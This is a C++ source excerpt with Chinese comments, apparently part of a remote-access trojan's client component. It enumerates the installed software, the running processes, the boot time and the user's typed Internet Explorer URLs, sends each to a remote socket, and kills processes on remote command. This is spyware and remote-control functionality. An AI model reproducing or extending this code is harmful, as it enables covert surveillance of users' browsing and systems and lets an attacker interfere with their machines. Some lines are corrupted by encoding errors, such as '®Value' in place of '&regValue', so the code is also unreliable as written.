//////////////leo/////////// ///////IE information/////// bool SoftInfo(SOCKET s,WSAEVENT hEvent) { SOFTINFO softinfo; DWORD retLen; HKEY m_key,m_key2; char m_SubKey[255]="SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"; DWORD m_index=0,count=0; char m_name[200],m_displayname[200],m_uninstall[200],uninstall[200]; DWORD m_namelen=200,m_displaynamelen=200, m_uninstalllen=200; DWORD m_attr=REG_BINARY|REG_DWORD|REG_EXPAND_SZ|REG_MULTI_SZ|REG_NONE|REG_SZ; if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,m_SubKey,0,KEY_ALL_ACCESS,&m_key)==ERROR_SUCCESS) { while (RegEnumKeyEx(m_key,m_index,m_name,&m_namelen,0,NULL,NULL,0)!=ERROR_NO_MORE_ITEMS) { m_index++; if (strcmp(m_name,"")!=NULL) { //如果找到了,分别在枚举下面有没有DISPLAYNAME,以便得到软件名称 strcpy(uninstall,m_SubKey); strcat(uninstall,"\"); strcat(uninstall,m_name); // 连接到下一层 m_displaynamelen=200; memset(m_displayname,0,200); m_uninstalllen=200;//先晴空内存数据 memset(m_uninstall,0,200); //再打开,查找软件显示现实名称和谢载命令行 if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,uninstall,0,KEY_ALL_ACCESS,&m_key2)==ERROR_SUCCESS) { RegQueryValueEx(m_key2,"DisplayName",0,&m_attr,LPBYTE(m_displayname),&m_displaynamelen); // RegQueryValueEx(m_key2,"UninstallString",0,&m_attr,LPBYTE(m_uninstall),&m_uninstalllen); if ( strcmp(m_displayname,"")==NULL||strcmp(m_displayname," ")==NULL||strcmp(m_displayname," ")==NULL) continue; //找到软件名或者反安装信息了 count++; strcpy(softinfo.softname,m_displayname); if(!SendDataS(s,(char*)&softinfo,sizeof(softinfo),&retLen,hEvent, SENDRECV_TIMEOUT)) { return false; } m_displaynamelen=200; //恢复内存数据,防止发生覆盖等错误 memset(m_displayname,0,200); m_uninstalllen=200; memset(m_uninstall,0,200); } } m_namelen=200; memset(m_name,0,200); }//end while RegCloseKey(m_key); } //end if return true; } bool ProInfo(SOCKET s,WSAEVENT hEvent) { PROINFO proinfo; PVOID pProcInfo = NULL; DWORD dwInfoSize = 0x20000; DWORD retLen; PPROCESSINFO pProcessInfo, temp; ///////////////////////////////// pProcInfo = (PVOID)(new byte[dwInfoSize]); long ( __stdcall *NtQuerySystemInformation )( DWORD, PVOID, DWORD, DWORD ); NtQuerySystemInformation = (long(__stdcall*)(DWORD,PVOID,DWORD,DWORD)) GetProcAddress( GetModuleHandle( "ntdll.dll" ),"NtQuerySystemInformation" ); //??????? NtQuerySystemInformation(5,pProcInfo,dwInfoSize,0); temp = pProcessInfo = (PPROCESSINFO)pProcInfo; ///////////////////////////////// float cpuusage; DWORD dwWorkingSet; __int64 TotalProcessCPUUsage = 0; __int64 CurrentProcessCPUUsage = 0; while(true) { TotalProcessCPUUsage += (__int64)pProcessInfo->KernelTime.QuadPart //?????????? + (__int64)pProcessInfo->UserTime.QuadPart; ///////// if(pProcessInfo->dwOffset == 0) { break; } pProcessInfo = (PPROCESSINFO)((byte*)pProcessInfo + pProcessInfo->dwOffset); } pProcessInfo = temp; while(true) { dwWorkingSet = pProcessInfo->dwWorkingSet; CurrentProcessCPUUsage = (__int64)pProcessInfo->KernelTime.QuadPart //?????????? + (__int64)pProcessInfo->UserTime.QuadPart; cpuusage = 100 * CurrentProcessCPUUsage / TotalProcessCPUUsage; //cpuusage?cpu??? char proname[64]; memset(proname, 0, 64); WideCharToMultiByte(CP_ACP, WC_COMPOSITECHECK,pProcessInfo->ProcessName.Buffer, -1,proname,64,NULL,NULL); if (strlen(proname) == 0) strcpy(proname, "系统空闲进程"); strcpy(proinfo.proname,proname); proinfo.ID=pProcessInfo->dwProcessID; proinfo.CPU=(DWORD)cpuusage; proinfo.memory=dwWorkingSet / 1024; if(!SendDataS(s,(char*)&proinfo,sizeof(proinfo),&retLen,hEvent, SENDRECV_TIMEOUT)) { return false; } ///////// if(pProcessInfo->dwOffset == 0) { break; } pProcessInfo = (PPROCESSINFO)((byte*)pProcessInfo + pProcessInfo->dwOffset); } delete[] pProcInfo; return true; } bool TerminatePro(SOCKET s,WSAEVENT hEvent) { DWORD retLen; DWORD dwID; if(!RecvDataS(s,(char*)&dwID,sizeof(dwID),&retLen,hEvent,SENDRECV_TIMEOUT)||retLen!=sizeof(dwID)) return false; HANDLE hPro=OpenProcess(PROCESS_ALL_ACCESS,TRUE,dwID); if (hPro==NULL) return false; if(!TerminateProcess(hPro,0)) return false; return true; } //////////////leo/////////// ///////IE information/////// bool Starttime(SOCKET s,WSAEVENT hEvent) { PROCNTQSI NtQuerySystemInformation; logInfo loginfo; DWORD retLen; SYSTEM_TIME_INFORMATION Sti; LONG status; FILETIME ftSystemBoot; SYSTEMTIME stSystemBoot; NtQuerySystemInformation = (PROCNTQSI)GetProcAddress( GetModuleHandle("ntdll"), "NtQuerySystemInformation" ); if (!NtQuerySystemInformation) return false ; status = NtQuerySystemInformation(SystemTimeInformation,&Sti,sizeof(Sti),0); if (status!=NO_ERROR) return false; ftSystemBoot = *(FILETIME *)&(Sti.liKeBootTime); FileTimeToLocalFileTime(&ftSystemBoot,&ftSystemBoot); FileTimeToSystemTime(&ftSystemBoot,&stSystemBoot); sprintf(loginfo.date,"%02d-%02d-%04d", stSystemBoot.wMonth,stSystemBoot.wDay,stSystemBoot.wYear); sprintf(loginfo.starttime,"%02d:%02d:%02d", stSystemBoot.wHour,stSystemBoot.wMinute,stSystemBoot.wSecond); if(!SendDataS(s,(char*)&loginfo,sizeof(loginfo),&retLen,hEvent, SENDRECV_TIMEOUT)) { return false; } return true; } //////////////leo/////////// ///////IE information/////// bool IEinfo(SOCKET s,WSAEVENT hEvent) { HKEY mkey; ieInfo ieinfo; DWORD retLen,namelen,datalen,index; namelen=256;datalen=512;index=0; REGEDIT regValue; memset((char*)®Value,0,sizeof(regValue)); char m_SubKey[255]="Software\Microsoft\Internet Explorer\TypedUrls"; DWORD m_attr=REG_BINARY|REG_DWORD|REG_EXPAND_SZ|REG_MULTI_SZ|REG_NONE|REG_SZ; if (RegOpenKeyEx(HKEY_CURRENT_USER,m_SubKey,0,KEY_ALL_ACCESS,&mkey)==ERROR_SUCCESS) { while(RegEnumValue(mkey,index,regValue.value,&namelen,NULL, ®Value.type,regValue.data,&datalen)!=ERROR_NO_MORE_ITEMS) { regValue.datalen=datalen; if(strlen(regValue.value)!=0) { strcpy(ieinfo.url,(char*)regValue.data); if(!SendDataS(s,(char*)&ieinfo,sizeof(ieinfo),&retLen,hEvent, SENDRECV_TIMEOUT)) { return false; } if(GetLastError()==MON_FUNERROR) break; } memset((char*)®Value,0,sizeof(regValue)); namelen=256;datalen=512; index++; } RegCloseKey(mkey); } return true; }